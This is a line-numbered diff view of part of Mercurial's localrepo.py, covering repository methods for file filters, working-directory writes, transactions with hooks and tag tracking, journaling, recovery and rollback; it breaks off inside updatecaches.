949 filtered = cl.filteredrevs
949 result = []
950 result = []
950 for n in nodes:
951 for n in nodes:
951 r = nm.get(n)
952 r = nm.get(n)
952 resp = not (r is None or r in filtered)
953 resp = not (r is None or r in filtered)
953 result.append(resp)
954 result.append(resp)
954 return result
955 return result
955
956
956 def local(self):
957 def local(self):
957 return self
958 return self
958
959
959 def publishing(self):
960 def publishing(self):
960 # it's safe (and desirable) to trust the publish flag unconditionally
961 # it's safe (and desirable) to trust the publish flag unconditionally
961 # so that we don't finalize changes shared between users via ssh or nfs
962 # so that we don't finalize changes shared between users via ssh or nfs
962 return self.ui.configbool('phases', 'publish', untrusted=True)
963 return self.ui.configbool('phases', 'publish', untrusted=True)
963
964
964 def cancopy(self):
965 def cancopy(self):
965 # so statichttprepo's override of local() works
966 # so statichttprepo's override of local() works
966 if not self.local():
967 if not self.local():
967 return False
968 return False
968 if not self.publishing():
969 if not self.publishing():
969 return True
970 return True
970 # if publishing we can't copy if there is filtered content
971 # if publishing we can't copy if there is filtered content
971 return not self.filtered('visible').changelog.filteredrevs
972 return not self.filtered('visible').changelog.filteredrevs
972
973
973 def shared(self):
974 def shared(self):
974 '''the type of shared repository (None if not shared)'''
975 '''the type of shared repository (None if not shared)'''
975 if self.sharedpath != self.path:
976 if self.sharedpath != self.path:
976 return 'store'
977 return 'store'
977 return None
978 return None
978
979
979 def wjoin(self, f, *insidef):
980 def wjoin(self, f, *insidef):
980 return self.vfs.reljoin(self.root, f, *insidef)
981 return self.vfs.reljoin(self.root, f, *insidef)
981
982
982 def file(self, f):
983 def file(self, f):
983 if f[0] == '/':
984 if f[0] == '/':
984 f = f[1:]
985 f = f[1:]
985 return filelog.filelog(self.svfs, f)
986 return filelog.filelog(self.svfs, f)
986
987
987 def changectx(self, changeid):
988 def changectx(self, changeid):
988 return self[changeid]
989 return self[changeid]
989
990
990 def setparents(self, p1, p2=nullid):
991 def setparents(self, p1, p2=nullid):
991 with self.dirstate.parentchange():
992 with self.dirstate.parentchange():
992 copies = self.dirstate.setparents(p1, p2)
993 copies = self.dirstate.setparents(p1, p2)
993 pctx = self[p1]
994 pctx = self[p1]
994 if copies:
995 if copies:
995 # Adjust copy records, the dirstate cannot do it, it
996 # Adjust copy records, the dirstate cannot do it, it
996 # requires access to parents manifests. Preserve them
997 # requires access to parents manifests. Preserve them
997 # only for entries added to first parent.
998 # only for entries added to first parent.
998 for f in copies:
999 for f in copies:
999 if f not in pctx and copies[f] in pctx:
1000 if f not in pctx and copies[f] in pctx:
1000 self.dirstate.copy(copies[f], f)
1001 self.dirstate.copy(copies[f], f)
1001 if p2 == nullid:
1002 if p2 == nullid:
1002 for f, s in sorted(self.dirstate.copies().items()):
1003 for f, s in sorted(self.dirstate.copies().items()):
1003 if f not in pctx and s not in pctx:
1004 if f not in pctx and s not in pctx:
1004 self.dirstate.copy(None, f)
1005 self.dirstate.copy(None, f)
1005
1006
1006 def filectx(self, path, changeid=None, fileid=None):
1007 def filectx(self, path, changeid=None, fileid=None):
1007 """changeid can be a changeset revision, node, or tag.
1008 """changeid can be a changeset revision, node, or tag.
1008 fileid can be a file revision or node."""
1009 fileid can be a file revision or node."""
1009 return context.filectx(self, path, changeid, fileid)
1010 return context.filectx(self, path, changeid, fileid)
1010
1011
1011 def getcwd(self):
1012 def getcwd(self):
1012 return self.dirstate.getcwd()
1013 return self.dirstate.getcwd()
1013
1014
1014 def pathto(self, f, cwd=None):
1015 def pathto(self, f, cwd=None):
1015 return self.dirstate.pathto(f, cwd)
1016 return self.dirstate.pathto(f, cwd)
1016
1017
1017 def _loadfilter(self, filter):
1018 def _loadfilter(self, filter):
1018 if filter not in self.filterpats:
1019 if filter not in self.filterpats:
1019 l = []
1020 l = []
1020 for pat, cmd in self.ui.configitems(filter):
1021 for pat, cmd in self.ui.configitems(filter):
1021 if cmd == '!':
1022 if cmd == '!':
1022 continue
1023 continue
1023 mf = matchmod.match(self.root, '', [pat])
1024 mf = matchmod.match(self.root, '', [pat])
1024 fn = None
1025 fn = None
1025 params = cmd
1026 params = cmd
1026 for name, filterfn in self._datafilters.iteritems():
1027 for name, filterfn in self._datafilters.iteritems():
1027 if cmd.startswith(name):
1028 if cmd.startswith(name):
1028 fn = filterfn
1029 fn = filterfn
1029 params = cmd[len(name):].lstrip()
1030 params = cmd[len(name):].lstrip()
1030 break
1031 break
1031 if not fn:
1032 if not fn:
1032 fn = lambda s, c, **kwargs: util.filter(s, c)
1033 fn = lambda s, c, **kwargs: util.filter(s, c)
1033 # Wrap old filters not supporting keyword arguments
1034 # Wrap old filters not supporting keyword arguments
1034 if not inspect.getargspec(fn)[2]:
1035 if not inspect.getargspec(fn)[2]:
1035 oldfn = fn
1036 oldfn = fn
1036 fn = lambda s, c, **kwargs: oldfn(s, c)
1037 fn = lambda s, c, **kwargs: oldfn(s, c)
1037 l.append((mf, fn, params))
1038 l.append((mf, fn, params))
1038 self.filterpats[filter] = l
1039 self.filterpats[filter] = l
1039 return self.filterpats[filter]
1040 return self.filterpats[filter]
1040
1041
1041 def _filter(self, filterpats, filename, data):
1042 def _filter(self, filterpats, filename, data):
1042 for mf, fn, cmd in filterpats:
1043 for mf, fn, cmd in filterpats:
1043 if mf(filename):
1044 if mf(filename):
1044 self.ui.debug("filtering %s through %s\n" % (filename, cmd))
1045 self.ui.debug("filtering %s through %s\n" % (filename, cmd))
1045 data = fn(data, cmd, ui=self.ui, repo=self, filename=filename)
1046 data = fn(data, cmd, ui=self.ui, repo=self, filename=filename)
1046 break
1047 break
1047
1048
1048 return data
1049 return data
1049
1050
1050 @unfilteredpropertycache
1051 @unfilteredpropertycache
1051 def _encodefilterpats(self):
1052 def _encodefilterpats(self):
1052 return self._loadfilter('encode')
1053 return self._loadfilter('encode')
1053
1054
1054 @unfilteredpropertycache
1055 @unfilteredpropertycache
1055 def _decodefilterpats(self):
1056 def _decodefilterpats(self):
1056 return self._loadfilter('decode')
1057 return self._loadfilter('decode')
1057
1058
1058 def adddatafilter(self, name, filter):
1059 def adddatafilter(self, name, filter):
1059 self._datafilters[name] = filter
1060 self._datafilters[name] = filter
1060
1061
1061 def wread(self, filename):
1062 def wread(self, filename):
1062 if self.wvfs.islink(filename):
1063 if self.wvfs.islink(filename):
1063 data = self.wvfs.readlink(filename)
1064 data = self.wvfs.readlink(filename)
1064 else:
1065 else:
1065 data = self.wvfs.read(filename)
1066 data = self.wvfs.read(filename)
1066 return self._filter(self._encodefilterpats, filename, data)
1067 return self._filter(self._encodefilterpats, filename, data)
1067
1068
1068 def wwrite(self, filename, data, flags, backgroundclose=False):
1069 def wwrite(self, filename, data, flags, backgroundclose=False):
1069 """write ``data`` into ``filename`` in the working directory
1070 """write ``data`` into ``filename`` in the working directory
1070
1071
1071 This returns length of written (maybe decoded) data.
1072 This returns length of written (maybe decoded) data.
1072 """
1073 """
1073 data = self._filter(self._decodefilterpats, filename, data)
1074 data = self._filter(self._decodefilterpats, filename, data)
1074 if 'l' in flags:
1075 if 'l' in flags:
1075 self.wvfs.symlink(data, filename)
1076 self.wvfs.symlink(data, filename)
1076 else:
1077 else:
1077 self.wvfs.write(filename, data, backgroundclose=backgroundclose)
1078 self.wvfs.write(filename, data, backgroundclose=backgroundclose)
1078 if 'x' in flags:
1079 if 'x' in flags:
1079 self.wvfs.setflags(filename, False, True)
1080 self.wvfs.setflags(filename, False, True)
1080 return len(data)
1081 return len(data)
1081
1082
1082 def wwritedata(self, filename, data):
1083 def wwritedata(self, filename, data):
1083 return self._filter(self._decodefilterpats, filename, data)
1084 return self._filter(self._decodefilterpats, filename, data)
1084
1085
1085 def currenttransaction(self):
1086 def currenttransaction(self):
1086 """return the current transaction or None if non exists"""
1087 """return the current transaction or None if non exists"""
1087 if self._transref:
1088 if self._transref:
1088 tr = self._transref()
1089 tr = self._transref()
1089 else:
1090 else:
1090 tr = None
1091 tr = None
1091
1092
1092 if tr and tr.running():
1093 if tr and tr.running():
1093 return tr
1094 return tr
1094 return None
1095 return None
1095
1096
1096 def transaction(self, desc, report=None):
1097 def transaction(self, desc, report=None):
1097 if (self.ui.configbool('devel', 'all-warnings')
1098 if (self.ui.configbool('devel', 'all-warnings')
1098 or self.ui.configbool('devel', 'check-locks')):
1099 or self.ui.configbool('devel', 'check-locks')):
1099 if self._currentlock(self._lockref) is None:
1100 if self._currentlock(self._lockref) is None:
1100 raise error.ProgrammingError('transaction requires locking')
1101 raise error.ProgrammingError('transaction requires locking')
1101 tr = self.currenttransaction()
1102 tr = self.currenttransaction()
1102 if tr is not None:
1103 if tr is not None:
1103 scmutil.registersummarycallback(self, tr, desc)
1104 scmutil.registersummarycallback(self, tr, desc)
1104 return tr.nest()
1105 return tr.nest()
1105
1106
1106 # abort here if the journal already exists
1107 # abort here if the journal already exists
1107 if self.svfs.exists("journal"):
1108 if self.svfs.exists("journal"):
1108 raise error.RepoError(
1109 raise error.RepoError(
1109 _("abandoned transaction found"),
1110 _("abandoned transaction found"),
1110 hint=_("run 'hg recover' to clean up transaction"))
1111 hint=_("run 'hg recover' to clean up transaction"))
1111
1112
1112 idbase = "%.40f#%f" % (random.random(), time.time())
1113 idbase = "%.40f#%f" % (random.random(), time.time())
1113 ha = hex(hashlib.sha1(idbase).digest())
1114 ha = hex(hashlib.sha1(idbase).digest())
1114 txnid = 'TXN:' + ha
1115 txnid = 'TXN:' + ha
1115 self.hook('pretxnopen', throw=True, txnname=desc, txnid=txnid)
1116 self.hook('pretxnopen', throw=True, txnname=desc, txnid=txnid)
1116
1117
1117 self._writejournal(desc)
1118 self._writejournal(desc)
1118 renames = [(vfs, x, undoname(x)) for vfs, x in self._journalfiles()]
1119 renames = [(vfs, x, undoname(x)) for vfs, x in self._journalfiles()]
1119 if report:
1120 if report:
1120 rp = report
1121 rp = report
1121 else:
1122 else:
1122 rp = self.ui.warn
1123 rp = self.ui.warn
1123 vfsmap = {'plain': self.vfs} # root of .hg/
1124 vfsmap = {'plain': self.vfs} # root of .hg/
1124 # we must avoid cyclic reference between repo and transaction.
1125 # we must avoid cyclic reference between repo and transaction.
1125 reporef = weakref.ref(self)
1126 reporef = weakref.ref(self)
1126 # Code to track tag movement
1127 # Code to track tag movement
1127 #
1128 #
1128 # Since tags are all handled as file content, it is actually quite hard
1129 # Since tags are all handled as file content, it is actually quite hard
1129 # to track these movement from a code perspective. So we fallback to a
1130 # to track these movement from a code perspective. So we fallback to a
1130 # tracking at the repository level. One could envision to track changes
1131 # tracking at the repository level. One could envision to track changes
1131 # to the '.hgtags' file through changegroup apply but that fails to
1132 # to the '.hgtags' file through changegroup apply but that fails to
1132 # cope with case where transaction expose new heads without changegroup
1133 # cope with case where transaction expose new heads without changegroup
1133 # being involved (eg: phase movement).
1134 # being involved (eg: phase movement).
1134 #
1135 #
1135 # For now, We gate the feature behind a flag since this likely comes
1136 # For now, We gate the feature behind a flag since this likely comes
1136 # with performance impacts. The current code run more often than needed
1137 # with performance impacts. The current code run more often than needed
1137 # and do not use caches as much as it could. The current focus is on
1138 # and do not use caches as much as it could. The current focus is on
1138 # the behavior of the feature so we disable it by default. The flag
1139 # the behavior of the feature so we disable it by default. The flag
1139 # will be removed when we are happy with the performance impact.
1140 # will be removed when we are happy with the performance impact.
1140 #
1141 #
1141 # Once this feature is no longer experimental move the following
1142 # Once this feature is no longer experimental move the following
1142 # documentation to the appropriate help section:
1143 # documentation to the appropriate help section:
1143 #
1144 #
1144 # The ``HG_TAG_MOVED`` variable will be set if the transaction touched
1145 # The ``HG_TAG_MOVED`` variable will be set if the transaction touched
1145 # tags (new or changed or deleted tags). In addition the details of
1146 # tags (new or changed or deleted tags). In addition the details of
1146 # these changes are made available in a file at:
1147 # these changes are made available in a file at:
1147 # ``REPOROOT/.hg/changes/tags.changes``.
1148 # ``REPOROOT/.hg/changes/tags.changes``.
1148 # Make sure you check for HG_TAG_MOVED before reading that file as it
1149 # Make sure you check for HG_TAG_MOVED before reading that file as it
1149 # might exist from a previous transaction even if no tag were touched
1150 # might exist from a previous transaction even if no tag were touched
1150 # in this one. Changes are recorded in a line base format::
1151 # in this one. Changes are recorded in a line base format::
1151 #
1152 #
1152 # <action> <hex-node> <tag-name>\n
1153 # <action> <hex-node> <tag-name>\n
1153 #
1154 #
1154 # Actions are defined as follow:
1155 # Actions are defined as follow:
1155 # "-R": tag is removed,
1156 # "-R": tag is removed,
1156 # "+A": tag is added,
1157 # "+A": tag is added,
1157 # "-M": tag is moved (old value),
1158 # "-M": tag is moved (old value),
1158 # "+M": tag is moved (new value),
1159 # "+M": tag is moved (new value),
1159 tracktags = lambda x: None
1160 tracktags = lambda x: None
1160 # experimental config: experimental.hook-track-tags
1161 # experimental config: experimental.hook-track-tags
1161 shouldtracktags = self.ui.configbool('experimental', 'hook-track-tags')
1162 shouldtracktags = self.ui.configbool('experimental', 'hook-track-tags')
1162 if desc != 'strip' and shouldtracktags:
1163 if desc != 'strip' and shouldtracktags:
1163 oldheads = self.changelog.headrevs()
1164 oldheads = self.changelog.headrevs()
1164 def tracktags(tr2):
1165 def tracktags(tr2):
1165 repo = reporef()
1166 repo = reporef()
1166 oldfnodes = tagsmod.fnoderevs(repo.ui, repo, oldheads)
1167 oldfnodes = tagsmod.fnoderevs(repo.ui, repo, oldheads)
1167 newheads = repo.changelog.headrevs()
1168 newheads = repo.changelog.headrevs()
1168 newfnodes = tagsmod.fnoderevs(repo.ui, repo, newheads)
1169 newfnodes = tagsmod.fnoderevs(repo.ui, repo, newheads)
1169 # notes: we compare lists here.
1170 # notes: we compare lists here.
1170 # As we do it only once buiding set would not be cheaper
1171 # As we do it only once buiding set would not be cheaper
1171 changes = tagsmod.difftags(repo.ui, repo, oldfnodes, newfnodes)
1172 changes = tagsmod.difftags(repo.ui, repo, oldfnodes, newfnodes)
1172 if changes:
1173 if changes:
1173 tr2.hookargs['tag_moved'] = '1'
1174 tr2.hookargs['tag_moved'] = '1'
1174 with repo.vfs('changes/tags.changes', 'w',
1175 with repo.vfs('changes/tags.changes', 'w',
1175 atomictemp=True) as changesfile:
1176 atomictemp=True) as changesfile:
1176 # note: we do not register the file to the transaction
1177 # note: we do not register the file to the transaction
1177 # because we needs it to still exist on the transaction
1178 # because we needs it to still exist on the transaction
1178 # is close (for txnclose hooks)
1179 # is close (for txnclose hooks)
1179 tagsmod.writediff(changesfile, changes)
1180 tagsmod.writediff(changesfile, changes)
1180 def validate(tr2):
1181 def validate(tr2):
1181 """will run pre-closing hooks"""
1182 """will run pre-closing hooks"""
1182 # XXX the transaction API is a bit lacking here so we take a hacky
1183 # XXX the transaction API is a bit lacking here so we take a hacky
1183 # path for now
1184 # path for now
1184 #
1185 #
1185 # We cannot add this as a "pending" hooks since the 'tr.hookargs'
1186 # We cannot add this as a "pending" hooks since the 'tr.hookargs'
1186 # dict is copied before these run. In addition we needs the data
1187 # dict is copied before these run. In addition we needs the data
1187 # available to in memory hooks too.
1188 # available to in memory hooks too.
1188 #
1189 #
1189 # Moreover, we also need to make sure this runs before txnclose
1190 # Moreover, we also need to make sure this runs before txnclose
1190 # hooks and there is no "pending" mechanism that would execute
1191 # hooks and there is no "pending" mechanism that would execute
1191 # logic only if hooks are about to run.
1192 # logic only if hooks are about to run.
1192 #
1193 #
1193 # Fixing this limitation of the transaction is also needed to track
1194 # Fixing this limitation of the transaction is also needed to track
1194 # other families of changes (bookmarks, phases, obsolescence).
1195 # other families of changes (bookmarks, phases, obsolescence).
1195 #
1196 #
1196 # This will have to be fixed before we remove the experimental
1197 # This will have to be fixed before we remove the experimental
1197 # gating.
1198 # gating.
1198 tracktags(tr2)
1199 tracktags(tr2)
1199 reporef().hook('pretxnclose', throw=True,
1200 reporef().hook('pretxnclose', throw=True,
1200 txnname=desc, **pycompat.strkwargs(tr.hookargs))
1201 txnname=desc, **pycompat.strkwargs(tr.hookargs))
1201 def releasefn(tr, success):
1202 def releasefn(tr, success):
1202 repo = reporef()
1203 repo = reporef()
1203 if success:
1204 if success:
1204 # this should be explicitly invoked here, because
1205 # this should be explicitly invoked here, because
1205 # in-memory changes aren't written out at closing
1206 # in-memory changes aren't written out at closing
1206 # transaction, if tr.addfilegenerator (via
1207 # transaction, if tr.addfilegenerator (via
1207 # dirstate.write or so) isn't invoked while
1208 # dirstate.write or so) isn't invoked while
1208 # transaction running
1209 # transaction running
1209 repo.dirstate.write(None)
1210 repo.dirstate.write(None)
1210 else:
1211 else:
1211 # discard all changes (including ones already written
1212 # discard all changes (including ones already written
1212 # out) in this transaction
1213 # out) in this transaction
1213 repo.dirstate.restorebackup(None, 'journal.dirstate')
1214 repo.dirstate.restorebackup(None, 'journal.dirstate')
1214
1215
1215 repo.invalidate(clearfilecache=True)
1216 repo.invalidate(clearfilecache=True)
1216
1217
1217 tr = transaction.transaction(rp, self.svfs, vfsmap,
1218 tr = transaction.transaction(rp, self.svfs, vfsmap,
1218 "journal",
1219 "journal",
1219 "undo",
1220 "undo",
1220 aftertrans(renames),
1221 aftertrans(renames),
1221 self.store.createmode,
1222 self.store.createmode,
1222 validator=validate,
1223 validator=validate,
1223 releasefn=releasefn,
1224 releasefn=releasefn,
1224 checkambigfiles=_cachedfiles)
1225 checkambigfiles=_cachedfiles)
1225 tr.changes['revs'] = set()
1226 tr.changes['revs'] = set()
1226 tr.changes['obsmarkers'] = set()
1227 tr.changes['obsmarkers'] = set()
1227 tr.changes['phases'] = {}
1228 tr.changes['phases'] = {}
1228 tr.changes['bookmarks'] = {}
1229 tr.changes['bookmarks'] = {}
1229
1230
1230 tr.hookargs['txnid'] = txnid
1231 tr.hookargs['txnid'] = txnid
1231 # note: writing the fncache only during finalize mean that the file is
1232 # note: writing the fncache only during finalize mean that the file is
1232 # outdated when running hooks. As fncache is used for streaming clone,
1233 # outdated when running hooks. As fncache is used for streaming clone,
1233 # this is not expected to break anything that happen during the hooks.
1234 # this is not expected to break anything that happen during the hooks.
1234 tr.addfinalize('flush-fncache', self.store.write)
1235 tr.addfinalize('flush-fncache', self.store.write)
1235 def txnclosehook(tr2):
1236 def txnclosehook(tr2):
1236 """To be run if transaction is successful, will schedule a hook run
1237 """To be run if transaction is successful, will schedule a hook run
1237 """
1238 """
1238 # Don't reference tr2 in hook() so we don't hold a reference.
1239 # Don't reference tr2 in hook() so we don't hold a reference.
1239 # This reduces memory consumption when there are multiple
1240 # This reduces memory consumption when there are multiple
1240 # transactions per lock. This can likely go away if issue5045
1241 # transactions per lock. This can likely go away if issue5045
1241 # fixes the function accumulation.
1242 # fixes the function accumulation.
1242 hookargs = tr2.hookargs
1243 hookargs = tr2.hookargs
1243
1244
1244 def hook():
1245 def hook():
1245 reporef().hook('txnclose', throw=False, txnname=desc,
1246 reporef().hook('txnclose', throw=False, txnname=desc,
1246 **pycompat.strkwargs(hookargs))
1247 **pycompat.strkwargs(hookargs))
1247 reporef()._afterlock(hook)
1248 reporef()._afterlock(hook)
1248 tr.addfinalize('txnclose-hook', txnclosehook)
1249 tr.addfinalize('txnclose-hook', txnclosehook)
1249 tr.addpostclose('warms-cache', self._buildcacheupdater(tr))
1250 tr.addpostclose('warms-cache', self._buildcacheupdater(tr))
1250 def txnaborthook(tr2):
1251 def txnaborthook(tr2):
1251 """To be run if transaction is aborted
1252 """To be run if transaction is aborted
1252 """
1253 """
1253 reporef().hook('txnabort', throw=False, txnname=desc,
1254 reporef().hook('txnabort', throw=False, txnname=desc,
1254 **tr2.hookargs)
1255 **tr2.hookargs)
1255 tr.addabort('txnabort-hook', txnaborthook)
1256 tr.addabort('txnabort-hook', txnaborthook)
1256 # avoid eager cache invalidation. in-memory data should be identical
1257 # avoid eager cache invalidation. in-memory data should be identical
1257 # to stored data if transaction has no error.
1258 # to stored data if transaction has no error.
1258 tr.addpostclose('refresh-filecachestats', self._refreshfilecachestats)
1259 tr.addpostclose('refresh-filecachestats', self._refreshfilecachestats)
1259 self._transref = weakref.ref(tr)
1260 self._transref = weakref.ref(tr)
1260 scmutil.registersummarycallback(self, tr, desc)
1261 scmutil.registersummarycallback(self, tr, desc)
1261 return tr
1262 return tr
1262
1263
1263 def _journalfiles(self):
1264 def _journalfiles(self):
1264 return ((self.svfs, 'journal'),
1265 return ((self.svfs, 'journal'),
1265 (self.vfs, 'journal.dirstate'),
1266 (self.vfs, 'journal.dirstate'),
1266 (self.vfs, 'journal.branch'),
1267 (self.vfs, 'journal.branch'),
1267 (self.vfs, 'journal.desc'),
1268 (self.vfs, 'journal.desc'),
1268 (self.vfs, 'journal.bookmarks'),
1269 (self.vfs, 'journal.bookmarks'),
1269 (self.svfs, 'journal.phaseroots'))
1270 (self.svfs, 'journal.phaseroots'))
1270
1271
1271 def undofiles(self):
1272 def undofiles(self):
1272 return [(vfs, undoname(x)) for vfs, x in self._journalfiles()]
1273 return [(vfs, undoname(x)) for vfs, x in self._journalfiles()]
1273
1274
1274 @unfilteredmethod
1275 @unfilteredmethod
1275 def _writejournal(self, desc):
1276 def _writejournal(self, desc):
1276 self.dirstate.savebackup(None, 'journal.dirstate')
1277 self.dirstate.savebackup(None, 'journal.dirstate')
1277 self.vfs.write("journal.branch",
1278 self.vfs.write("journal.branch",
1278 encoding.fromlocal(self.dirstate.branch()))
1279 encoding.fromlocal(self.dirstate.branch()))
1279 self.vfs.write("journal.desc",
1280 self.vfs.write("journal.desc",
1280 "%d\n%s\n" % (len(self), desc))
1281 "%d\n%s\n" % (len(self), desc))
1281 self.vfs.write("journal.bookmarks",
1282 self.vfs.write("journal.bookmarks",
1282 self.vfs.tryread("bookmarks"))
1283 self.vfs.tryread("bookmarks"))
1283 self.svfs.write("journal.phaseroots",
1284 self.svfs.write("journal.phaseroots",
1284 self.svfs.tryread("phaseroots"))
1285 self.svfs.tryread("phaseroots"))
1285
1286
1286 def recover(self):
1287 def recover(self):
1287 with self.lock():
1288 with self.lock():
1288 if self.svfs.exists("journal"):
1289 if self.svfs.exists("journal"):
1289 self.ui.status(_("rolling back interrupted transaction\n"))
1290 self.ui.status(_("rolling back interrupted transaction\n"))
1290 vfsmap = {'': self.svfs,
1291 vfsmap = {'': self.svfs,
1291 'plain': self.vfs,}
1292 'plain': self.vfs,}
1292 transaction.rollback(self.svfs, vfsmap, "journal",
1293 transaction.rollback(self.svfs, vfsmap, "journal",
1293 self.ui.warn,
1294 self.ui.warn,
1294 checkambigfiles=_cachedfiles)
1295 checkambigfiles=_cachedfiles)
1295 self.invalidate()
1296 self.invalidate()
1296 return True
1297 return True
1297 else:
1298 else:
1298 self.ui.warn(_("no interrupted transaction available\n"))
1299 self.ui.warn(_("no interrupted transaction available\n"))
1299 return False
1300 return False
1300
1301
1301 def rollback(self, dryrun=False, force=False):
1302 def rollback(self, dryrun=False, force=False):
1302 wlock = lock = dsguard = None
1303 wlock = lock = dsguard = None
1303 try:
1304 try:
1304 wlock = self.wlock()
1305 wlock = self.wlock()
1305 lock = self.lock()
1306 lock = self.lock()
1306 if self.svfs.exists("undo"):
1307 if self.svfs.exists("undo"):
1307 dsguard = dirstateguard.dirstateguard(self, 'rollback')
1308 dsguard = dirstateguard.dirstateguard(self, 'rollback')
1308
1309
1309 return self._rollback(dryrun, force, dsguard)
1310 return self._rollback(dryrun, force, dsguard)
1310 else:
1311 else:
1311 self.ui.warn(_("no rollback information available\n"))
1312 self.ui.warn(_("no rollback information available\n"))
1312 return 1
1313 return 1
1313 finally:
1314 finally:
1314 release(dsguard, lock, wlock)
1315 release(dsguard, lock, wlock)
1315
1316
1316 @unfilteredmethod # Until we get smarter cache management
1317 @unfilteredmethod # Until we get smarter cache management
1317 def _rollback(self, dryrun, force, dsguard):
1318 def _rollback(self, dryrun, force, dsguard):
1318 ui = self.ui
1319 ui = self.ui
1319 try:
1320 try:
1320 args = self.vfs.read('undo.desc').splitlines()
1321 args = self.vfs.read('undo.desc').splitlines()
1321 (oldlen, desc, detail) = (int(args[0]), args[1], None)
1322 (oldlen, desc, detail) = (int(args[0]), args[1], None)
1322 if len(args) >= 3:
1323 if len(args) >= 3:
1323 detail = args[2]
1324 detail = args[2]
1324 oldtip = oldlen - 1
1325 oldtip = oldlen - 1
1325
1326
1326 if detail and ui.verbose:
1327 if detail and ui.verbose:
1327 msg = (_('repository tip rolled back to revision %d'
1328 msg = (_('repository tip rolled back to revision %d'
1328 ' (undo %s: %s)\n')
1329 ' (undo %s: %s)\n')
1329 % (oldtip, desc, detail))
1330 % (oldtip, desc, detail))
1330 else:
1331 else:
1331 msg = (_('repository tip rolled back to revision %d'
1332 msg = (_('repository tip rolled back to revision %d'
1332 ' (undo %s)\n')
1333 ' (undo %s)\n')
1333 % (oldtip, desc))
1334 % (oldtip, desc))
1334 except IOError:
1335 except IOError:
1335 msg = _('rolling back unknown transaction\n')
1336 msg = _('rolling back unknown transaction\n')
1336 desc = None
1337 desc = None
1337
1338
1338 if not force and self['.'] != self['tip'] and desc == 'commit':
1339 if not force and self['.'] != self['tip'] and desc == 'commit':
1339 raise error.Abort(
1340 raise error.Abort(
1340 _('rollback of last commit while not checked out '
1341 _('rollback of last commit while not checked out '
1341 'may lose data'), hint=_('use -f to force'))
1342 'may lose data'), hint=_('use -f to force'))
1342
1343
1343 ui.status(msg)
1344 ui.status(msg)
1344 if dryrun:
1345 if dryrun:
1345 return 0
1346 return 0
1346
1347
1347 parents = self.dirstate.parents()
1348 parents = self.dirstate.parents()
1348 self.destroying()
1349 self.destroying()
1349 vfsmap = {'plain': self.vfs, '': self.svfs}
1350 vfsmap = {'plain': self.vfs, '': self.svfs}
1350 transaction.rollback(self.svfs, vfsmap, 'undo', ui.warn,
1351 transaction.rollback(self.svfs, vfsmap, 'undo', ui.warn,
1351 checkambigfiles=_cachedfiles)
1352 checkambigfiles=_cachedfiles)
1352 if self.vfs.exists('undo.bookmarks'):
1353 if self.vfs.exists('undo.bookmarks'):
1353 self.vfs.rename('undo.bookmarks', 'bookmarks', checkambig=True)
1354 self.vfs.rename('undo.bookmarks', 'bookmarks', checkambig=True)
1354 if self.svfs.exists('undo.phaseroots'):
1355 if self.svfs.exists('undo.phaseroots'):
1355 self.svfs.rename('undo.phaseroots', 'phaseroots', checkambig=True)
1356 self.svfs.rename('undo.phaseroots', 'phaseroots', checkambig=True)
1356 self.invalidate()
1357 self.invalidate()
1357
1358
1358 parentgone = (parents[0] not in self.changelog.nodemap or
1359 parentgone = (parents[0] not in self.changelog.nodemap or
1359 parents[1] not in self.changelog.nodemap)
1360 parents[1] not in self.changelog.nodemap)
1360 if parentgone:
1361 if parentgone:
1361 # prevent dirstateguard from overwriting already restored one
1362 # prevent dirstateguard from overwriting already restored one
1362 dsguard.close()
1363 dsguard.close()
1363
1364
1364 self.dirstate.restorebackup(None, 'undo.dirstate')
1365 self.dirstate.restorebackup(None, 'undo.dirstate')
1365 try:
1366 try:
1366 branch = self.vfs.read('undo.branch')
1367 branch = self.vfs.read('undo.branch')
1367 self.dirstate.setbranch(encoding.tolocal(branch))
1368 self.dirstate.setbranch(encoding.tolocal(branch))
1368 except IOError:
1369 except IOError:
1369 ui.warn(_('named branch could not be reset: '
1370 ui.warn(_('named branch could not be reset: '
1370 'current branch is still \'%s\'\n')
1371 'current branch is still \'%s\'\n')
1371 % self.dirstate.branch())
1372 % self.dirstate.branch())
1372
1373
1373 parents = tuple([p.rev() for p in self[None].parents()])
1374 parents = tuple([p.rev() for p in self[None].parents()])
1374 if len(parents) > 1:
1375 if len(parents) > 1:
1375 ui.status(_('working directory now based on '
1376 ui.status(_('working directory now based on '
1376 'revisions %d and %d\n') % parents)
1377 'revisions %d and %d\n') % parents)
1377 else:
1378 else:
1378 ui.status(_('working directory now based on '
1379 ui.status(_('working directory now based on '
1379 'revision %d\n') % parents)
1380 'revision %d\n') % parents)
1380 mergemod.mergestate.clean(self, self['.'].node())
1381 mergemod.mergestate.clean(self, self['.'].node())
1381
1382
1382 # TODO: if we know which new heads may result from this rollback, pass
1383 # TODO: if we know which new heads may result from this rollback, pass
1383 # them to destroy(), which will prevent the branchhead cache from being
1384 # them to destroy(), which will prevent the branchhead cache from being
1384 # invalidated.
1385 # invalidated.
1385 self.destroyed()
1386 self.destroyed()
1386 return 0
1387 return 0
1387
1388
1388 def _buildcacheupdater(self, newtransaction):
1389 def _buildcacheupdater(self, newtransaction):
1389 """called during transaction to build the callback updating cache
1390 """called during transaction to build the callback updating cache
1390
1391
1391 Lives on the repository to help extension who might want to augment
1392 Lives on the repository to help extension who might want to augment
1392 this logic. For this purpose, the created transaction is passed to the
1393 this logic. For this purpose, the created transaction is passed to the
1393 method.
1394 method.
1394 """
1395 """
1395 # we must avoid cyclic reference between repo and transaction.
1396 # we must avoid cyclic reference between repo and transaction.
1396 reporef = weakref.ref(self)
1397 reporef = weakref.ref(self)
1397 def updater(tr):
1398 def updater(tr):
1398 repo = reporef()
1399 repo = reporef()
1399 repo.updatecaches(tr)
1400 repo.updatecaches(tr)
1400 return updater
1401 return updater
1401
1402
1402 @unfilteredmethod
1403 @unfilteredmethod
1403 def updatecaches(self, tr=None):
1404 def updatecaches(self, tr=None):
1404 """warm appropriate caches
1405 """warm appropriate caches
1405
1406
1406 If this function is called after a transaction closed. The transaction
1407 If this function is called after a transaction closed. The transaction
1407 will be available in the 'tr' argument. This can be used to selectively
1408 will be available in the 'tr' argument. This can be used to selectively
1408 update caches relevant to the changes in that transaction.
1409 update caches relevant to the changes in that transaction.
1409 """
1410 """
1410 if tr is not None and tr.hookargs.get('source') == 'strip':
1411 if tr is not None and tr.hookargs.get('source') == 'strip':
1411 # During strip, many caches are invalid but
1412 # During strip, many caches are invalid but
1412 # later call to `destroyed` will refresh them.
1413 # later call to `destroyed` will refresh them.
1413 return
1414 return
1414
1415
1415 if tr is None or tr.changes['revs']:
1416 if tr is None or tr.changes['revs']:
